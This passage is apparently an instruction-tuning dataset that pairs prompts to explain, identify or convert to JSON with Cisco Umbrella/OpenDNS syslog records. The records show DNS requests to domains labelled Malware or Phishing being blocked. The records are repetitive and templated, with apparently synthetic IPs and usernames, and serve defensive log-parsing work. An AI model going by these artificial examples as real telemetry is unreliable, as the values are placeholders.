"166.106.104.132", "serverIP": "251.142.138.134", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"166.106.104.132","externalIp":"251.142.138.134","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=166.106.104.132 ::: serverIP=251.142.138.134 ::: userName=bob ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"166.106.104.132","externalIp":"251.142.138.134","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=166.106.104.132 ::: serverIP=251.142.138.134 ::: userName=bob ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: fructed-vulgarizers-mixology.click messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: fructed-vulgarizers-mixology.click severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-25T10:40:30.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Malware streamName: OpenDNS Detection clientIP: 166.106.104.132 serverIP: 251.142.138.134 userName: bob
Explain this syslog message
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"35.140.128.247","externalIp":"24.185.121.195","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=35.140.128.247 ::: serverIP=24.185.121.195 ::: userName=charlie ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "cambbek.com", "message": "WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"35.140.128.247\",\"externalIp\":\"24.185.121.195\",\"categories\":[\"Phishing\"],\"tags\":[],\"destination\":\"cambbek.com\",\"originLabel\":\"charlie\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T18:07:49.000Z\"} ::: clientIP=35.140.128.247 ::: serverIP=24.185.121.195 ::: userName=charlie ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "cambbek.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-25T18:07:49.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Phishing", "streamName": "OpenDNS Detection", "clientIP": "35.140.128.247", "serverIP": "24.185.121.195", "userName": "charlie" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"35.140.128.247","externalIp":"24.185.121.195","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=35.140.128.247 ::: serverIP=24.185.121.195 ::: userName=charlie ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"35.140.128.247","externalIp":"24.185.121.195","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=35.140.128.247 ::: serverIP=24.185.121.195 ::: userName=charlie ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: cambbek.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: cambbek.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-25T18:07:49.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Phishing streamName: OpenDNS Detection clientIP: 35.140.128.247 serverIP: 24.185.121.195 userName: charlie
Explain this syslog message
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"159.23.130.85","externalIp":"150.67.189.3","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=159.23.130.85 ::: serverIP=150.67.189.3 ::: userName=bob ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "cambbek.com", "message": "WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"159.23.130.85\",\"externalIp\":\"150.67.189.3\",\"categories\":[\"Phishing\"],\"tags\":[],\"destination\":\"cambbek.com\",\"originLabel\":\"bob\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T18:07:49.000Z\"} ::: clientIP=159.23.130.85 ::: serverIP=150.67.189.3 ::: userName=bob ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "cambbek.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-25T18:07:49.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Phishing", "streamName": "OpenDNS Detection", "clientIP": "159.23.130.85", "serverIP": "150.67.189.3", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"159.23.130.85","externalIp":"150.67.189.3","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=159.23.130.85 ::: serverIP=150.67.189.3 ::: userName=bob ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"159.23.130.85","externalIp":"150.67.189.3","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=159.23.130.85 ::: serverIP=150.67.189.3 ::: userName=bob ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: cambbek.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: cambbek.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-25T18:07:49.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Phishing streamName: OpenDNS Detection clientIP: 159.23.130.85 serverIP: 150.67.189.3 userName: bob
Explain this syslog message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"60.130.22.57","externalIp":"91.165.115.168","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=60.130.22.57 ::: serverIP=91.165.115.168 ::: userName=janedoe ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "fructed-vulgarizers-mixology.click", "message": "WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"60.130.22.57\",\"externalIp\":\"91.165.115.168\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"fructed-vulgarizers-mixology.click\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T10:40:30.000Z\"} ::: clientIP=60.130.22.57 ::: serverIP=91.165.115.168 ::: userName=janedoe ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "fructed-vulgarizers-mixology.click", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-25T10:40:30.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Malware", "streamName": "OpenDNS Detection", "clientIP": "60.130.22.57", "serverIP": "91.165.115.168", "userName": "janedoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"60.130.22.57","externalIp":"91.165.115.168","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=60.130.22.57 ::: serverIP=91.165.115.168 ::: userName=janedoe ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"60.130.22.57","externalIp":"91.165.115.168","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=60.130.22.57 ::: serverIP=91.165.115.168 ::: userName=janedoe ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: fructed-vulgarizers-mixology.click messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: fructed-vulgarizers-mixology.click severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-25T10:40:30.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Malware streamName: OpenDNS Detection clientIP: 60.130.22.57 serverIP: 91.165.115.168 userName: janedoe
Explain this syslog message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"169.8.192.25","externalIp":"44.58.139.123","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=169.8.192.25 ::: serverIP=44.58.139.123 ::: userName=charlie ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "fructed-vulgarizers-mixology.click", "message": "WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"169.8.192.25\",\"externalIp\":\"44.58.139.123\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"fructed-vulgarizers-mixology.click\",\"originLabel\":\"charlie\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T10:40:30.000Z\"} ::: clientIP=169.8.192.25 ::: serverIP=44.58.139.123 ::: userName=charlie ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "fructed-vulgarizers-mixology.click", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-25T10:40:30.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Malware", "streamName": "OpenDNS Detection", "clientIP": "169.8.192.25", "serverIP": "44.58.139.123", "userName": "charlie" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"169.8.192.25","externalIp":"44.58.139.123","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=169.8.192.25 ::: serverIP=44.58.139.123 ::: userName=charlie ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"169.8.192.25","externalIp":"44.58.139.123","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=169.8.192.25 ::: serverIP=44.58.139.123 ::: userName=charlie ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: fructed-vulgarizers-mixology.click messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: fructed-vulgarizers-mixology.click severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-25T10:40:30.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Malware streamName: OpenDNS Detection clientIP: 169.8.192.25 serverIP: 44.58.139.123 userName: charlie
Explain this syslog message
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"45.10.82.240","externalIp":"30.155.12.114","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=45.10.82.240 ::: serverIP=30.155.12.114 ::: userName=nighthawk ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "cambbek.com", "message": "WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"45.10.82.240\",\"externalIp\":\"30.155.12.114\",\"categories\":[\"Phishing\"],\"tags\":[],\"destination\":\"cambbek.com\",\"originLabel\":\"nighthawk\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T18:07:49.000Z\"} ::: clientIP=45.10.82.240 ::: serverIP=30.155.12.114 ::: userName=nighthawk ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "cambbek.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-25T18:07:49.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Phishing", "streamName": "OpenDNS Detection", "clientIP": "45.10.82.240", "serverIP": "30.155.12.114", "userName": "nighthawk" }
Create a JSON artifact from the message